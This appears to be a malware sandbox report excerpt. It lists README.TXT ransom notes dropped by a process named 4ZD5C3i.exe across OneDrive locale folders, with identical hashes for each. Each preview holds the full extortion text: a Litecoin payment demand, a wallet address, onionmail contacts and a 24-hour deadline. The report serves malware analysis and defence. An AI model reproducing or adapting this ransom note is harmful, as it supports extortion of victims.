                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ml-in\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\mn\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\mr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ms\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\mt-MT\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\nb-NO\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ne-NP\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\nl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\nn-NO\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\nso-ZA\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\or-IN\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\pa-Arab-PK\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\pa\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\pl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\platforms\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\pt-BR\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
